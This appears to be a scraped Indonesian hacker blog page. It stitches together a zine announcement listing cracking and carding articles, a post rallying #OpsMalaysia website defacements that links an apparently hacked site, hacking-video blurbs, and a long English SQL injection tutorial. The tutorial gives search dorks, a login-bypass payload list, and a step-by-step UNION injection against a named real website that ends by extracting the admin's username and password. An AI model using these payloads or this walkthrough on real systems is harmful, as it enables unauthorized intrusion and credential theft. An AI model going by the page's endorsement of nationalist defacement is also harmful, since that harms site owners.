CN-ZINE18 - CODENESIA

Assalamualaikum,wr,wb

Alhamdulilah puji syukur kepada Allah akhirnya codenesia bisa release majalah online lagi
ya CN-ZINE18 dengan tampilan yang "WAW" (sambil koprol3x)
yang pastinya sudah ditunggu2 oleh pembaca setia Codenesia Magazine
Mungkin ini adalah obat dahaga bagi sebagian newbie karena di CN-ZINE18 ini
Dedengkot Echo yaitu om y3dips sebagai target wawancaranya angkat bicara (ciyus miapa?) :p~
Udah ga usah kebanyakan 4l4y dan ga percaya gitu pakai bilang "serius , demi apa" segala? hahaha
kalo ga percaya buktikan sendiri download dan baca !!!


isi artikel CN-ZNE18 diantaranya:
-Wawancara dengan om y3dips tentang "WAJAH HACKERs INDONESIA"
-Brute Force Server with CMD [j0ck3r]
-Trick Bypass Content Filtering Tanpa Proxy dan Tools [X-Cisadane]
-Trick sulap MPC menjadi Ipod [X-Cisadane]
-Bypass Proteksi Password User SmadAv [anharku]
-Crack Windows Xp Sp3 [weduz69]
-Software Pencari Crack [dnz]
-Cheatbook Database for Cheater [DNZ]
-Crack All Deepfreeze [D-Cracker]
-Art of CC [illegal_seller]
-Papercracft Anonymous [Hakz]
-AnonNews
-Info Magazine & Movie
-Windows8 & Ubuntu 12.04[News]
-Progress Codenesia 2012
CN-ZINE18 kali ini agak berbeda dengan CN-ZINE-CN-ZINE sebelumnya
karena desain layout benar2 didesain sedemikian rupa
sehingga tiap halaman memiliki kesan tersendiri dan kaya akan warna.
desain layout satu atau dua halaman untuk satu pokok bahasan
dan juga info2 menarik seputar dunia komputer agar kalian tidak bosan,
dan tidak muntah-muntah karena selalu disodorkan dengan tutorial-tutorial.
Tunggu apalagi donload CN-ZINE18 di link berikut ini:

link muncul setelah kamu login :)
LOGIN FORUM DULU , BARU KE WEBSITE CODENESIA , coz databasenya digabung :)

CN-ZINE18 juga tersedia dalam Versi exe, namun jangan lupa instal Adobe Flash Player dulu biar majalahnya bisa dibuka
http://get.adobe.com/flashplayer/

download CN-ZINE18 exe version di link berikut ini:


semoga bermanfaat.
Wassalammualaikum,wr,wb

Admin

Attachment	Size	Hits	Last download
sc18.rar	55.96 KB	31	6 min 41 sec ago

source : http://codenesia.com/artikel/cn-zine18-issue-wajah-hackers-indonesia-wawancara-dengan-y3dips.aspx

Malaysia Berulah Dedemit Maya Indonesia siapkan #OpsMalaysia

Lagi-Lagi Malaysia berulah, dari dulu hingga sekarang malaysia selalu berulah
negeri tetangga ini selalu mencari masalah dengan bangsa kita
Tidak hanya aksi klaim atas kebudayaan bangsa indonesia saja.
aksi yang satu ini sangat menghina bangsa indonesia
benar saja ,Supporter Malaysia ternyata menghina Indonesia begitu rendah seperti yel-yel yang diteriakkan Ultras Malaysia di Piala AFF 2012.
Saat Malaysia ditundukkan Singapura 3-0, Minggu (25/11), supporter Ultras itu justru mengejek Indonesia yang justru tak bertanding di Stadion Bukit Jalil.
Yel-yel Indonesia itu begitu menghina dimana Tanah Air disamakan dengan binatang dalam nyanyian yang diteriakkan pendukung Malaysia.
berita selengkapnya bisa anda baca di artikelid.com
dan bisa dilihat sendiri di vidio youtube berikut ini http://www.youtube.com/watch?v=-wO5kVisztw

mendengar aksi tersebut Kuping para Dedemit Maya pun memanas
dalam sebuah event di fb #OpsMalaysia
tak mau hargadiri bangsa ini diinjak2
menyatakan
Malaysia sudah melecehkan INDONESIA Tercinta dengan YEL-YEL
=========================================
#OpsMalaysia ini bukan memprovokasi Rakyat Indonesia dan Aktivis IT Indonesia pada khususnya,
melainkan untuk "SIAGA" jika si malay sudah keterlaluan (menurut saya secara pribadi sudah keterlaluan).
Apalagi sudah di upload di youtube dan dapat disaksikan oleh semua orang di dunia.
Kami Indonesian Cyber Army "siap tempur" dalam dunia maya.
salah satu aksi #OpsMalaysia http://www.ogsm.org.my/.php
Ya walaupun perintah "GANYANG MALAYSIA" sudah ada sejak zaman pak SOEKARNO
dan sampai sekarangpun malaysia bukan menjadi kawan malah selalu menjadi lawan lebih sadisnya di bilang musuh bebuyutan bangsa ini
namun kita harus menggunakan kepala dingin, tetap sabar, dan melihat perkembangan yang ada.
Harusnya Malaysia minta maaf atas tindakan penghinaan tersebut.
Kita lihat saja perkembangannya
Timnas Indonesia cuma butuh IMBANG melawan malaysia
kalau besok Timnas indonesia MENANG justru MALAYSIA akan sangat menahan malu
karena sudah menghina kalah lagi.
Namun apabila Timnas Indonesia kalah
para DEFACER indonesia akan sangat GALAU dan melampiaskannya dengan defacement website malaysia
demikian sekilas info
original posted by anharku

source link : http://codenesia.com/news/malaysia-berulah-dedemit-maya-indonesia-siapkan-opsmalaysia.aspx

Average Selection Friends on FACEBOOK

1. Open event > Invite Friends > Scroll down or to that part what you want invite(if all > to end)

2. Press Ctrl-Shift-K

3. Copy and paste the code below into the area that opens up with the flashing cursor then hit enter. Done.

javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i<elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()};

Hak5 1215.1 Run Windows apps in Linux the easy way, Netflix unofficially on Linux, and Chocolate!

This time on the show, Netflix comes to Linux! Sort of. We'll explain how and what this might mean for the industry. Then, playing games and other Windows apps in Linux with WINE, which, isn't an emulator. But it is. Sorta. Plus, our favorite Linux commands. One of 'em involves chocolate! Stay tuned! All that and more this time on Hak5!

backtrack 5 R3 - Automatically Cracking WEP Networks

This video is to show beginners how they can automatically crack a WEP Wireless network using autocrack which is a Open Source Project.
Please remember that in some countrys and states trying to preform an attack on a network you don't have authorization to preform attacks on is consider illegal please only use this on your own networks.

Complete Manual SQL Tutorial

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:

Code:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

Code:

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this

username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in :D

PART 2
Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here : http://www.mediafire.com/?y7v30lcj0kn8836
http://adf.ly/cjpJ <--- password is somewhere in it
PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add a '

So our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'

Press enter and you get some kind of error. The errors will vary...

Our page should look like that : (Click to View)

After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error that means you should lower the number of columns .
Let's try 10.

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--

The page opened normally that means the number of columns is between 10 and 14.
We try now 11.

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--

The page opened normally too...
Let's try 12.

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .

Our page should look like that : (Click to View)

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that : (Click to View)

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that : (Click to View)

Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin

Spoiler (Click to View)

Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html

Spoiler (Click to View)

Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :

Code:

tbladmin

Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:

Code:

116,98,108,97,100,109,105,110

Spoiler (Click to View)

Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:

Spoiler (Click to View)

Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :

Spoiler (Click to View)

And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.
http://www.mediafire.com/?7qd7t6r3b13ccq4
http://adf.ly/cjpJ<---- the password is in it somewhere :)
And We're Done !

I hope you liked my tutorial .
ALL credits go to me !
Thanks for reading that thread.

source : http://www.hackitcafe.com/2011/06/complete-manual-sqli-tutorial.html
Or       : http://websec.ca/kb/sql_injection 

animator vs animations in 3D - 3ds Max

animator vs animations in 3D - 3ds Max

Anonymous Browsing The Easy Way - HAK5

This time on the show, we continue hacking the airwaves with RFcat, a usb radio dongle and a little python lovin'. Then I'm setting up a bit of counter surveillance rig the easy way with a live Onion Router distro. Plus, portable VPN clients for unprivileged users - what are your open source options? All that and more, this time on Hak5!